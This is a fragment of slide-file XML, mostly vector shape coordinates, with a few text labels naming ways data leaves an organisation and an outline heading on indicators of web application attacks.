                  <a:lnTo>
                    <a:pt x="449072" y="86868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="86868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="536194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158877" y="378714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293509" y="519277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262966" y="559498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236537" y="597052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211340" y="635520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187413" y="674852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164782" y="715048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143471" y="756056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123507" y="797852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104940" y="840409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87769" y="883704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72034" y="927696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57785" y="972362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45021" y="1017689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33782" y="1063612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24104" y="1110132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16002" y="1157211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9525" y="1204810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4686" y="1252918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524" y="1301496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244094" y="1301496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247700" y="1253261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253326" y="1205598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260934" y="1158557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270471" y="1112189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281901" y="1066533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295173" y="1021626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310248" y="977519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327088" y="934250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345630" y="891857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365861" y="850392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387705" y="809891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411149" y="770394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436130" y="731951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462610" y="694601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490550" y="658380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519899" y="623341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550621" y="589521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582663" y="556971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616000" y="525716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650570" y="495808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686333" y="467296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723252" y="440220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761276" y="414616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800379" y="390525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840498" y="367995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881608" y="347065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="923645" y="327787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966571" y="310197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010361" y="294335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1054950" y="280238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100302" y="267970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146390" y="257543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193139" y="249021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240536" y="242443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240536" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2743200" h="2711450">
                  <a:moveTo>
                    <a:pt x="2741676" y="89916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2293874" y="89916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2452243" y="247269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319223" y="375081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2284565" y="342861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249386" y="312356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213191" y="283032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2175992" y="254927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137829" y="228079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2098738" y="202501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058733" y="178219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017864" y="155282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1976158" y="133718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933625" y="113550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890318" y="94818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1846262" y="77533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1801482" y="61747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756016" y="47472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709902" y="34759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1663141" y="23622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615795" y="14097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1567878" y="6210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519428" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519428" y="242697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1567484" y="250228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1614855" y="259740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661515" y="271208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1707388" y="284581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752447" y="299808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796643" y="316852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1839937" y="335673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882267" y="356222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1923605" y="378447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1963889" y="402310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2003082" y="427774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2041144" y="454787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078024" y="483298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113673" y="513270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2148052" y="544664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181123" y="577430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212822" y="611530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2243112" y="646912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271941" y="683526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299284" y="721334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2325078" y="760298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2349271" y="800379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371839" y="841502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2392730" y="883653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411895" y="926782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429281" y="970838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2444851" y="1015771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458555" y="1061554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2470353" y="1108125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2480208" y="1155458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488057" y="1203490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2493861" y="1252181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2497582" y="1301496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2740152" y="1301496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2737002" y="1252143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732138" y="1203274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2725559" y="1154925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2717330" y="1107109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2707449" y="1059878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2695968" y="1013256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2682913" y="967257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2668308" y="921943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2652191" y="877316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2634577" y="833412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2615527" y="790270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2595041" y="747928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573172" y="706386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2549931" y="665708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2525369" y="625906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499499" y="587019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472359" y="549071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2445664" y="514286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2584704" y="381508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741676" y="538988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741676" y="89916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2743200" h="2711450">
                  <a:moveTo>
                    <a:pt x="2743200" y="2255901"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2583434" y="2416302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2407107" y="2230336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2423566" y="2211247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2453208" y="2174430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2481592" y="2136584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2508694" y="2097747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2534475" y="2057971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2558910" y="2017268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2581948" y="1975662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603589" y="1933219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623769" y="1889937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642476" y="1845868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2659672" y="1801050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675331" y="1755495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2689402" y="1709254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2701874" y="1662341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2712694" y="1614805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721864" y="1566672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476119" y="1566672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465159" y="1614436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2452205" y="1661401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2437282" y="1707527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420467" y="1752777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2401773" y="1797075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381275" y="1840395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2359012" y="1882686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2335022" y="1923910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2309368" y="1963991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2282088" y="2002904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2253234" y="2040585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2222855" y="2077008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191004" y="2112099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157717" y="2145830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2123046" y="2178139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087041" y="2208987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2049754" y="2238337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011222" y="2266111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1971509" y="2292286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1930641" y="2316797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1888693" y="2339619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1845691" y="2360676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1801685" y="2379942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756740" y="2397353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710893" y="2412873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664182" y="2426449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616671" y="2438044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568399" y="2447582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519428" y="2455037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519428" y="2697480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568500" y="2691333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617040" y="2683446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664995" y="2673858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712341" y="2662593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1759051" y="2649690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805089" y="2635186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850402" y="2619108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894992" y="2601480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938807" y="2582354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981822" y="2561755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2023986" y="2539695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065299" y="2516238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2105710" y="2491409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2145182" y="2465222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183688" y="2437727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2221204" y="2408948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257691" y="2378938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2274328" y="2364270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450973" y="2549144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295525" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743200" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743200" y="2255901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14844" y="4789931"/>
              <a:ext cx="1231392" cy="123139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704590" y="3909847"/>
            <a:ext cx="2462530" cy="797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24865" marR="5080" indent="-812800">
              <a:lnSpc>
                <a:spcPct val="115100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Rem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ving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ex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nal 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media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08019" y="6472580"/>
            <a:ext cx="2282190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209" marR="5080" indent="-17145">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Transfer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7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data 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v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netwo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135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>k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071354" y="6472580"/>
            <a:ext cx="2449195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0170" marR="5080" indent="-78105">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Taki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7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pi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tur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 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video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f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ex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50373" y="3766210"/>
            <a:ext cx="3394075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6700" marR="5080" indent="-254635">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Communicating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dirty="0" sz="2200" spc="-14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over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phone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4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by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video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67936" y="4258436"/>
            <a:ext cx="81260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14">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Outline</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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29611" y="3294379"/>
            <a:ext cx="3733800" cy="4551680"/>
            <a:chOff x="2229611" y="3294379"/>
            <a:chExt cx="3733800" cy="4551680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2229611" y="4123943"/>
              <a:ext cx="2783205" cy="2783205"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2783204" h="2783204">
                  <a:moveTo>
                    <a:pt x="1391412" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1343576" y="806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296144" y="3209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249144" y="7183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202601" y="12701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156540" y="19738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110987" y="28267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065969" y="38263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021512" y="49701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977640" y="62553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934381" y="76794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891760" y="92399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849802" y="109341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808535" y="127594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767983" y="147133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728172" y="167931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689130" y="189963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650880" y="213203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613450" y="237625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576866" y="263203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541152" y="289911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506335" y="317723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472442" y="346614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439497" y="376557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407527" y="407527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376557" y="439497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346614" y="472442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317723" y="506335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289911" y="541152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263203" y="576866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237625" y="613450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213203" y="650880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189963" y="689130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167931" y="728172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147133" y="767983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127594" y="808535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109341" y="849802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92399" y="891760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76794" y="934381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62553" y="977640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49701" y="1021512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38263" y="1065969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28267" y="1110987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19738" y="1156540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12701" y="1202601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7183" y="1249144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209" y="1296144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="1343576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1391411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="1439247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209" y="1486679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7183" y="1533679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12701" y="1580222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19738" y="1626283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28267" y="1671836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38263" y="1716854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49701" y="1761311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62553" y="1805183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76794" y="1848442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92399" y="1891063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109341" y="1933021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127594" y="1974288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147133" y="2014840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167931" y="2054651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189963" y="2093693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213203" y="2131943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237625" y="2169373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263203" y="2205957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289911" y="2241671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317723" y="2276488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346614" y="2310381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376557" y="2343326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407527" y="2375296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439497" y="2406266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472442" y="2436209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506335" y="2465100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541152" y="2492912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576866" y="2519620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613450" y="2545198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650880" y="2569620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689130" y="2592860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728172" y="2614892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767983" y="2635690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808535" y="2655229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849802" y="2673482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891760" y="2690424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934381" y="2706029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977640" y="2720270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021512" y="2733122"/>
                  </a:lnTo>
                  <a:lnTo>
